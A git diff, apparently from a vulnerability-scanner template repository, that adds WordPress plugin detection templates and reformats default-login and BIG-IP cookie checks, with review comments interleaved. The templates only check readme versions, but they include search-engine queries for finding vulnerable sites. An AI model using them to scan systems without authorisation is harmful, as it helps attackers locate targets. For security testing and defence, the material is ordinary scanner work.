diff --git a/date.txt b/date.txt
index 94bd479181..83b31cda11 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240909
+20240910
diff --git a/poc.txt b/poc.txt
index 798b7d5385..23d0ead20c 100644
--- a/poc.txt
+++ b/poc.txt
@@ -6006,6 +6006,7 @@
 ./poc/aws/amazonify.yaml
 ./poc/aws/amazonjs-c241b0ba6a777f828cfa26db407af41e.yaml
 ./poc/aws/amazonjs.yaml
+./poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml
 ./poc/aws/amazonsimpleadmin-d2d940074fe5416377c3e4ffb35b3f1c.yaml
 ./poc/aws/amazonsimpleadmin.yaml
 ./poc/aws/ameliabooking-b8eb9b9fe9a052fc9eec2c7665eb339b.yaml
@@ -26378,6 +26379,7 @@
 ./poc/cve/CVE-2023-29173.yaml
 ./poc/cve/CVE-2023-29174-61b19180a709a75a8f2f6bd443cf11c8.yaml
 ./poc/cve/CVE-2023-29174.yaml
+./poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml
 ./poc/cve/CVE-2023-29197-7dc7820b451dace4c37e93f29ab994ee.yaml
 ./poc/cve/CVE-2023-29197-a89dc10c82ed3d904f8fccc2ff4db320.yaml
 ./poc/cve/CVE-2023-29197.yaml
@@ -37558,6 +37560,7 @@
 ./poc/cve/CVE-2024-33652.yaml
 ./poc/cve/CVE-2024-33677-71525e5cb85c8646c9830951ba75e550.yaml
 ./poc/cve/CVE-2024-33677.yaml
+./poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml
 ./poc/cve/CVE-2024-33678-eaa7987a0e4044fbd5c104ca79591002.yaml
 ./poc/cve/CVE-2024-33678.yaml
 ./poc/cve/CVE-2024-33679-c2d079d10a67dd551de05116c6aaebcc.yaml
@@ -37957,6 +37960,7 @@
 ./poc/cve/CVE-2024-34769.yaml
 ./poc/cve/CVE-2024-3477-8c47af07f2484600ac78a772de46f68b.yaml
 ./poc/cve/CVE-2024-3477.yaml
+./poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml
 ./poc/cve/CVE-2024-34770-ad98ab01447e870f30191b4a919aae5b.yaml
 ./poc/cve/CVE-2024-34770.yaml
 ./poc/cve/CVE-2024-3478-f1b1672a851a069e48120221fa992476.yaml
@@ -38466,6 +38470,7 @@
 ./poc/cve/CVE-2024-3593-300e668244981d2f75260f71f7454d0f.yaml
 ./poc/cve/CVE-2024-3593.yaml
 ./poc/cve/CVE-2024-3594-36d7fb83c790460bdb8c61a1e30649d8.yaml
+./poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml
 ./poc/cve/CVE-2024-3594.yaml
 ./poc/cve/CVE-2024-3595-ae707ffdb0b84fee78545094f31fab5f.yaml
 ./poc/cve/CVE-2024-3595-af3cf7279598a37cf244aabc61c9a195.yaml
@@ -39255,6 +39260,7 @@
 ./poc/cve/CVE-2024-37961-c0a5626619ae68f7938a6724943ffe58.yaml
 ./poc/cve/CVE-2024-37961.yaml
 ./poc/cve/CVE-2024-37962-5340ecfad7167231bd651c5b5b0499b1.yaml
+./poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml
 ./poc/cve/CVE-2024-37962.yaml
 ./poc/cve/CVE-2024-3806-2a7b3e2b9fc8d52b51ef6216a756d24e.yaml
 ./poc/cve/CVE-2024-3806.yaml
@@ -40415,6 +40421,7 @@
 ./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml
 ./poc/cve/CVE-2024-43335.yaml
 ./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml
+./poc/cve/CVE-2024-43336-9ded2f75d9ce3d5a447116c77b245d3a.yaml
 ./poc/cve/CVE-2024-43336.yaml
 ./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml
 ./poc/cve/CVE-2024-43337.yaml
@@ -41950,6 +41957,7 @@
 ./poc/cve/CVE-2024-6271.yaml
 ./poc/cve/CVE-2024-6272-603d5732dac8de6d8f0b5ed827bd29fe.yaml
 ./poc/cve/CVE-2024-6272.yaml
+./poc/cve/CVE-2024-6282-9839fb12a0e52741eda32351ffbc9c9f.yaml
 ./poc/cve/CVE-2024-6283-b109f55830b5166e15fc8153b2a56ea0.yaml
 ./poc/cve/CVE-2024-6283.yaml
 ./poc/cve/CVE-2024-6288-3b7a2d7a942fc59043d359b6700da5b3.yaml
@@ -42489,6 +42497,7 @@
 ./poc/cve/CVE-2024-7486.yaml
 ./poc/cve/CVE-2024-7492-2a27ab15f61a26513636485e06679756.yaml
 ./poc/cve/CVE-2024-7492.yaml
+./poc/cve/CVE-2024-7493-827cf828502e280939934bc36fcd15c8.yaml
 ./poc/cve/CVE-2024-7493-bb0a14087d0fade0f7feffc68abdc7a6.yaml
 ./poc/cve/CVE-2024-7493.yaml
 ./poc/cve/CVE-2024-7501-247bb3617bfa1396392f3b42a0d66a58.yaml
@@ -42525,6 +42534,7 @@
 ./poc/cve/CVE-2024-7607.yaml
 ./poc/cve/CVE-2024-7611-fa595bf0bd7d1cd7d067d139d8655508.yaml
 ./poc/cve/CVE-2024-7611.yaml
+./poc/cve/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml
 ./poc/cve/CVE-2024-7620-bcec0146e1a4df3dcb256abef7433801.yaml
 ./poc/cve/CVE-2024-7620.yaml
 ./poc/cve/CVE-2024-7621-410ca600b3388f15ef833a17e3d39b81.yaml
@@ -42550,6 +42560,7 @@
 ./poc/cve/CVE-2024-7651-54b05056620424ffb4dfd689f232601b.yaml
 ./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml
 ./poc/cve/CVE-2024-7651.yaml
+./poc/cve/CVE-2024-7655-cb8797e18cf270e181c88790358f477b.yaml
 ./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml
 ./poc/cve/CVE-2024-7656.yaml
 ./poc/cve/CVE-2024-7687-ec8f591b67a17cc36542cbb68d2a1c0e.yaml
@@ -42570,6 +42581,7 @@
 ./poc/cve/CVE-2024-7703.yaml
 ./poc/cve/CVE-2024-7717-8b2d72f894c49fa210faf06966bb467e.yaml
 ./poc/cve/CVE-2024-7717.yaml
+./poc/cve/CVE-2024-7770-0dc95a63b6c1c6ccfca48ccb324269b5.yaml
 ./poc/cve/CVE-2024-7775-cb89a9bf3c0d813debb09dc21c3f085f.yaml
 ./poc/cve/CVE-2024-7775.yaml
 ./poc/cve/CVE-2024-7777-e2bdcc8b58b83d53647a50d88143707d.yaml
@@ -42673,10 +42685,12 @@
 ./poc/cve/CVE-2024-8199.yaml
 ./poc/cve/CVE-2024-8200-212df01da660270f0a3ccabafd9f05f2.yaml
 ./poc/cve/CVE-2024-8200.yaml
+./poc/cve/CVE-2024-8241-14534f7d6cad6e621d3cc87a4cd42487.yaml
 ./poc/cve/CVE-2024-8247-7ddc0c06e971c1cf25a0f3f37508e6b0.yaml
 ./poc/cve/CVE-2024-8247.yaml
 ./poc/cve/CVE-2024-8252-2918e2ad48b79ca4c8bb4e4cd2023c96.yaml
 ./poc/cve/CVE-2024-8252.yaml
+./poc/cve/CVE-2024-8268-75f27436435201ac5094d8b23bf9fb95.yaml
 ./poc/cve/CVE-2024-8274-bda8d98f83bd3baa9ee6eb35650a9ef1.yaml
 ./poc/cve/CVE-2024-8274.yaml
 ./poc/cve/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
@@ -42696,14 +42710,17 @@
 ./poc/cve/CVE-2024-8325.yaml
 ./poc/cve/CVE-2024-8363-7b614cefc269f651d0fa9d8a81fb52fb.yaml
 ./poc/cve/CVE-2024-8363.yaml
+./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml
 ./poc/cve/CVE-2024-8427-fbcab5496b8138780394aea71f3f3840.yaml
 ./poc/cve/CVE-2024-8427.yaml
 ./poc/cve/CVE-2024-8428-3b140a48fddab0e2501d7d69c672d7cf.yaml
 ./poc/cve/CVE-2024-8428.yaml
+./poc/cve/CVE-2024-8478-2c5877806cf2b984d8159c04c86877bf.yaml
 ./poc/cve/CVE-2024-8480-f1d8d42bfc1633b849f4ef6346a133c9.yaml
 ./poc/cve/CVE-2024-8480.yaml
 ./poc/cve/CVE-2024-8538-001bcf7ee52037e79f6a696add474366.yaml
 ./poc/cve/CVE-2024-8538.yaml
+./poc/cve/CVE-2024-8543-0a87e99d4b00c51f4b0142f0f5daaa10.yaml
 ./poc/cve/CVE_2023_49442.yaml
 ./poc/cve/CVE_2023_51467.yaml
 ./poc/cve/CVE_2024_0195.yaml
@@ -72715,6 +72732,7 @@
 ./poc/other/eventprime-event-calendar-management-09b45fe19dc9ef9fdacc3f3c93fdeb43.yaml
 ./poc/other/eventprime-event-calendar-management-337fb39e946da153801a049df0010f31.yaml
 ./poc/other/eventprime-event-calendar-management-53b5da835a02c27f602111203957ec44.yaml
+./poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml
 ./poc/other/eventprime-event-calendar-management-6d9f0383e02ac4e75e81aa915059c89c.yaml
 ./poc/other/eventprime-event-calendar-management-70abe0d924c478ac3475ca57424b78cc.yaml
 ./poc/other/eventprime-event-calendar-management-98dee7484a8ec61da325326fb7f20f00.yaml
@@ -74408,6 +74426,7 @@
 ./poc/other/frontend-checklist-8caa47b5e9e485adece08d242ad04ac8.yaml
 ./poc/other/frontend-checklist-f057cd0fecbe00e411754884f6dfe796.yaml
 ./poc/other/frontend-checklist.yaml
+./poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml
 ./poc/other/frontend-dashboard-b8834e5a3e036dd5e61d34a3b1068be9.yaml
 ./poc/other/frontend-dashboard.yaml
 ./poc/other/frontend-group-restriction-for-learndash-ff9293ba28748efa2ab9a2fe77385468.yaml
@@ -79637,6 +79656,7 @@
 ./poc/other/master-addons-49d43f190785c213b594369e56643fab.yaml
 ./poc/other/master-addons-4c613eb3f9ae83b4f2727f836be94578.yaml
 ./poc/other/master-addons-500ddd1cca6c96c69b650e8e1ea970a5.yaml
+./poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml
 ./poc/other/master-addons-6dcdd4533f288f97c824b10ce7bbf082.yaml
 ./poc/other/master-addons-768e76e5751dd7dcd77cdc7476921144.yaml
 ./poc/other/master-addons-80da3f3078021e19df6d4a183eff6fe9.yaml
@@ -81707,6 +81727,7 @@
 ./poc/other/notifyvisitors-lead-form-3d4e190fa6ca2f85ee1692fd779d0a41.yaml
 ./poc/other/notifyvisitors-lead-form.yaml
 ./poc/other/notion-phish.yaml
+./poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml
 ./poc/other/nova-lite-edebb837b13ffab3391e4efe2a95bf38.yaml
 ./poc/other/nova-lite.yaml
 ./poc/other/novelist-2fcbba4f8d24450ee551bf33de17fc72.yaml
@@ -82797,11 +82818,13 @@
 ./poc/other/pear.yaml
 ./poc/other/peepso-core-338fc97c24276ab87a510e79a909afca.yaml
 ./poc/other/peepso-core-3b2ef2d73cbfd65b1121e5f18e3b865d.yaml
+./poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml
 ./poc/other/peepso-core-64a4f42c48ab8916a593b8cc4bce89ff.yaml
 ./poc/other/peepso-core-8d22cf43a481ff4afe0b785ad4d465cd.yaml
 ./poc/other/peepso-core-967f9c4943c798ef55841614fa0c0a60.yaml
 ./poc/other/peepso-core-a40b1529b71b3a56ebe346e649ca082d.yaml
 ./poc/other/peepso-core-a6c5d9f5ae6235e3cb6733928ebe1440.yaml
+./poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml
 ./poc/other/peepso-core-eefb756a660cd5c8041e631a00deeb83.yaml
 ./poc/other/peepso-core-f7840d6d28c8b20841ce043179efa799.yaml
 ./poc/other/peepso-core.yaml
@@ -87918,6 +87941,7 @@
 ./poc/other/slider-by-supsystic-cda4bcfc95d6584a29dc850e5d8998c8.yaml
 ./poc/other/slider-by-supsystic-e595a0c3ad3e0defdd41b40b77d69b2c.yaml
 ./poc/other/slider-by-supsystic.yaml
+./poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml
 ./poc/other/slider-factory-0712326ce3eb85c1c14309021d79da22.yaml
 ./poc/other/slider-factory-42e7c67c33e54fce9877ed077a2d8484.yaml
 ./poc/other/slider-factory-6352f4cd29f3e453ab1742964f7f7fd8.yaml
@@ -90728,6 +90752,7 @@
 ./poc/other/tutor-3057751d1052c52502e1097b3cf1325d.yaml
 ./poc/other/tutor-347023f6e6e65ca497fc94dddd1d0a05.yaml
 ./poc/other/tutor-3a0643f16f3e861f0bb145ef053d314e.yaml
+./poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml
 ./poc/other/tutor-460504934ff174d5667f70afce2ce24e.yaml
 ./poc/other/tutor-46fb7d83480d94b010199c53923212f5.yaml
 ./poc/other/tutor-4b5310b2ba9a839700768e9d26ada001.yaml
@@ -103021,6 +103046,7 @@
 ./poc/sql/CVE-2024-7380-6a19e79de20767dbc62e297886ac1342.yaml
 ./poc/sql/CVE-2024-7390-c6e14cdb3bb6b824b90602f2e8d31a7e.yaml
 ./poc/sql/CVE-2024-7485-5e01bfd496bdbeeb312898de18c1a6e1.yaml
+./poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml
 ./poc/sql/CVE-2024-7702-dea8b852582db90080db47397ce3b7b1.yaml
 ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml
 ./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml
@@ -103031,6 +103057,7 @@
 ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml
 ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
 ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml
+./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml
 ./poc/sql/Changdao-165-SQLi.yaml
 ./poc/sql/Cmseasy-Http-Head-sqli.yaml
 ./poc/sql/Cmseasy-celive-sqli.yaml
@@ -104801,6 +104828,7 @@
 ./poc/sql/felici-8b7315bf3bc5aee1fd2be3bdb32c5f24.yaml
 ./poc/sql/felici-e83986bdda01c6cbf916db6f349af367.yaml
 ./poc/sql/file-manager-38267cacb7d16b0f0dbad9cdccc3b164.yaml
+./poc/sql/file-manager-5afc1d5d5506db51958aa1cb25998e9c.yaml
 ./poc/sql/fileorganizer-d129dcd91671ee29c3cf5545f48db813.yaml
 ./poc/sql/filmix-09180f4ff94074ad413e55c77fdb25a4.yaml
 ./poc/sql/filr-protection-6477bf18cad6c823db485408d49b337b.yaml
diff --git a/poc/auth/huawei-HG532e-default-login.yaml b/poc/auth/huawei-HG532e-default-login.yaml
index 2ebc7ab348..5b907dd987 100644
--- a/poc/auth/huawei-HG532e-default-login.yaml
+++ b/poc/auth/huawei-HG532e-default-login.yaml
@@ -1,17 +1,11 @@
 id: huawei-HG532e-default-login
 info:
 name: Huawei HG532e Default Credential
- description: Huawei HG532e default admin credentials were discovered.
 author: pussycat0x
 severity: high
 metadata:
 shodan-query: http.html:"HG532e"
 tags: default-login,huawei
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
 requests:
 - raw:
 - |
@@ -34,5 +28,3 @@ requests:
 - type: status
 status:
 - 200
-
-# Enhanced by mp on 2022/03/10
diff --git a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml
index 1c6bd1751b..d80088fb86 100644
--- a/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml
+++ b/poc/auth/miscellaneous_unencrypted-bigip-ltm-cookie.yaml
@@ -1,20 +1,23 @@
-id: unencrypted-bigip-ltm-cookie
-info:
- name: F5 BIGIP Unencrypted Cookie
- author: PR3R00T
- severity: info
- reference:
- - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values
- - https://support.f5.com/csp/article/K23254150
- tags: misc
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- redirects: true
- matchers:
- - type: regex
- regex:
- '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)'
- '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};'
- part: header
+id: unencrypted-bigip-ltm-cookie
+
+info:
+ name: F5 BIGIP Unencrypted Cookie
+ author: PR3R00T
+ severity: info
+ reference:
+ - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values
+ - https://support.f5.com/csp/article/K23254150
+ tags: misc
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ matchers:
+ - type: regex
+ regex:
+ - '(BIGipServer[a-z\_\.\-\~0-9A-Z]*)=([0-9a-zA-Z\.]*;)'
+ - '=[0-9]*\.[0-9]{3,5}\.[0-9]{4};'
+ part: header
\ No newline at end of file
diff --git a/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml b/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml
new file mode 100644
index 0000000000..f1cc4c0a97
--- /dev/null
+++ b/poc/aws/amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39.yaml
@@ -0,0 +1,59 @@
+id: amazonsimpleadmin-6edf77024f4d8b245b28ab2d095dfd39
+
+info:
+ name: >
+ Affiliate Super Assistent <= 1.5.3 - Unauthenticated Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/amazonsimpleadmin/"
+ google-query: inurl:"/wp-content/plugins/amazonsimpleadmin/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,amazonsimpleadmin,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/amazonsimpleadmin/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "amazonsimpleadmin"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml b/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml
new file mode 100644
index 0000000000..550099c607
--- /dev/null
+++ b/poc/cve/CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105.yaml
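Review bot: The `info` block of this template leaves `description`, `cvss-metrics`, `cvss-score` and `cve-id` empty and carries a dangling `shodan-query: 'vuln:'`, yet `tags` still includes `cve`, so anyone filtering on that tag or on classification receives a finding with no identifier or score behind it. `severity: low` is therefore not backed by any metric, which matters because the title describes unauthenticated shortcode execution. Either populate these fields from the Wordfence advisory listed under `reference`, or until an identifier exists drop the empty keys together with the `shodan-query` line and use `tags: wordpress,wp-plugin,amazonsimpleadmin,low`.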
@@ -0,0 +1,59 @@
+id: CVE-2023-2919-66712a820c7b5deedf6bafaea3bd5105
+
+info:
+ name: >
+ Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable'
+ author: topscoder
+ severity: medium
+ description: >
+ The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2023-2919
+ metadata:
+ fofa-query: "wp-content/plugins/tutor/"
+ google-query: inurl:"/wp-content/plugins/tutor/"
+ shodan-query: 'vuln:CVE-2023-2919'
+ tags: cve,wordpress,wp-plugin,tutor,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "tutor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.4')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml b/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml
new file mode 100644
index 0000000000..01a10b25d9
--- /dev/null
+++ b/poc/cve/CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5.yaml
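Review bot: The `description` of this template — and of every other new template in this commit, which share the same `http` section — does not say that the check is version-only: the template reads `Stable tag` from `readme.txt` and compares it with `compare_versions`, so a match means "an installed version inside the affected range", not that the missing nonce check on `addon_enable_disable` was confirmed, and a stale or absent readme produces a silent miss rather than a finding. One sentence in the description, for example `Detection is version-based (readme.txt Stable tag) and does not verify exploitability.`, would keep triage honest for consumers who only see the template output. Separately, the second `version` extractor appears to exist only so the value is printed, since the first one is `internal: true`; if the DSL matcher can already read a named extractor without the `internal` flag, a single non-internal extractor would do the same job with less duplication.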
@@ -0,0 +1,59 @@
+id: CVE-2024-33678-36a986088fbfded3f902f0126e5df7b5
+
+info:
+ name: >
+ ClickCease Click Fraud Protection <= 3.2.7 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+ The ClickCease Click Fraud Protection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.7. This is due to missing or incorrect nonce validation on the save_settings() function. This makes it possible for unauthenticated attackers to update settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e03f95ae-c1ba-4679-888b-055293e1351f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-33678
+ metadata:
+ fofa-query: "wp-content/plugins/clickcease-click-fraud-protection/"
+ google-query: inurl:"/wp-content/plugins/clickcease-click-fraud-protection/"
+ shodan-query: 'vuln:CVE-2024-33678'
+ tags: cve,wordpress,wp-plugin,clickcease-click-fraud-protection,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clickcease-click-fraud-protection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clickcease-click-fraud-protection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.7')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml b/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml
new file mode 100644
index 0000000000..891296a2f7
--- /dev/null
+++ b/poc/cve/CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-34770-24ff7976a24ecae8467028a04882e6a8
+
+info:
+ name: >
+ Popup Maker – Responsive popup, Exit Intent Pop up, Email Optins, Autoresponder & More <= 1.3.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Popup Maker – Responsive popup, Exit Intent Pop up, Email Optins, Autoresponder & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1e4f0d78-caa0-4575-a090-e1c12d4ed8fd?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-34770
+ metadata:
+ fofa-query: "wp-content/plugins/popup-maker-wp/"
+ google-query: inurl:"/wp-content/plugins/popup-maker-wp/"
+ shodan-query: 'vuln:CVE-2024-34770'
+ tags: cve,wordpress,wp-plugin,popup-maker-wp,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/popup-maker-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "popup-maker-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.6')
\ No newline at end of file
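Review bot: `severity: low` and the trailing `low` tag disagree with `cvss-score: 6.4`, which sits in the Medium band (4.0–6.9) of the CVSS v3.1 qualitative scale that the `cvss-metrics` vector on the line above it uses; the same mismatch is present in the new CVE-2024-3594 (4.4), CVE-2024-37962 (6.4), CVE-2024-6282 (5.4) and CVE-2024-7618 (4.4) templates in this commit. Tooling that sorts or gates on `severity` will rank these stored-XSS findings below what their own scores say. Suggested change here: `severity: medium` and `tags: cve,wordpress,wp-plugin,popup-maker-wp,medium`, with the corresponding adjustment in the other four templates, or a note in `description` if the lower label is intentional.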
diff --git a/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml b/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml
new file mode 100644
index 0000000000..1957f62171
--- /dev/null
+++ b/poc/cve/CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-3594-c595d74d6be314ede9d7c2ad86657f6d
+
+info:
+ name: >
+ IDonate – blood request management system <= 1.9.1 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The IDonate – blood request management system plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.9.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4ff558bb-7c5a-4e17-a3f5-bc9aa2332af1?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-3594
+ metadata:
+ fofa-query: "wp-content/plugins/idonate/"
+ google-query: inurl:"/wp-content/plugins/idonate/"
+ shodan-query: 'vuln:CVE-2024-3594'
+ tags: cve,wordpress,wp-plugin,idonate,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/idonate/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "idonate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.9.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml b/poc/cve/CVE-2024-37962-d175fbe85434a0614bc0ae08147f4de6.yaml
new file mode 100644
index 0000000000..c07ba07f4e
--- /dev/null
